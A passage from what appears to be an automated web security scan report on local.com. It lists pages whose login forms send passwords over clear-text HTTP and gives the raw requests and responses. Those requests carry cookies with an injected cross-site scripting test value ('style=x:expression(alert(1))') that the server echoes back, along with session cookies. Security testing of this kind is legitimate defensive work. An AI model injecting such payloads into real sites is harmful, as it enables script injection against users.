Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058&events.kw=none; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Content-Length: 87986

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Dallas Theatre and Comedy Eve
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

7.26. http://www.local.com/events/category/sports/dallas-tx.aspx

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /events/category/sports/dallas-tx.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /events/category/sports/dallas-tx.aspx HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 90349
Date: Thu, 03 Feb 2011 16:44:33 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:44:32 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058&events.kw=none; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Content-Length: 90349

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Dallas Sports Events | Find S
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

7.27. http://www.local.com/faq.aspx

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /faq.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /faq.aspx HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
ntCoent-Length: 28952
Date: Thu, 03 Feb 2011 16:53:12 GMT
Content-Length: 28952
Connection: close
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:53:12 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Local.com Frequently Asked Qu
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

7.28. http://www.local.com/privacy/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /privacy/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /privacy/ HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
ntCoent-Length: 50592
Date: Thu, 03 Feb 2011 16:51:52 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:51:52 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Content-Length: 50592

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Local.com Privacy Policy</tit
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

7.29. http://www.local.com/results.aspx

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /results.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /results.aspx HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 74200
Date: Thu, 03 Feb 2011 15:55:02 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ASP.NET_SessionId=wu21mu55lor2xjbsdwrsmh45; path=/; HttpOnly
Set-Cookie: localcom=cid=710&loc=Dallas%2c+TX&kw=none&uid=1c5b338d-bcdd-44ba-b370-36f6691769b8&expdate=634349085027409460&bc=Results+for+none+in+Dallas%2c+TX|serp|%2fresults.aspx&rs=none|Dallas%2c+TX!~Dallas%2c+TX; domain=local.com; expires=Sat, 05-Mar-2011 15:55:02 GMT; path=/
Content-Length: 74200

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Dallas, TX none | Find none i
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

7.30. http://www.local.com/results/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /results/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /results/ HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 133026
Date: Thu, 03 Feb 2011 16:50:31 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:50:30 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults%2f~Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Content-Length: 133026

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Dallas, TX banks | Find banks
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

7.31. http://www.local.com/sitemap.aspx

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /sitemap.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /sitemap.aspx HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
ntCoent-Length: 29850
Date: Thu, 03 Feb 2011 16:53:24 GMT
Content-Length: 29850
Connection: close
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:53:24 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Dallas, TX - Search for Local
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

7.32. http://www.local.com/sitemap/chicago-il.aspx

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /sitemap/chicago-il.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /sitemap/chicago-il.aspx HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 130753
Date: Thu, 03 Feb 2011 16:50:57 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:50:56 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Chicago%2c+Illinois&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Content-Length: 130753

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Chicago, IL Local Business Se
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

7.33. http://www.local.com/sitemap/los-angeles-ca.aspx

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /sitemap/los-angeles-ca.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /sitemap/los-angeles-ca.aspx HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 132986
Date: Thu, 03 Feb 2011 16:50:42 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:50:42 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Los+Angeles%2c+California&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Content-Length: 132986

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Los Angeles, CA Local Busines
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

7.34. http://www.local.com/sitemap/new-york-ny.aspx

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /sitemap/new-york-ny.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /sitemap/new-york-ny.aspx HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
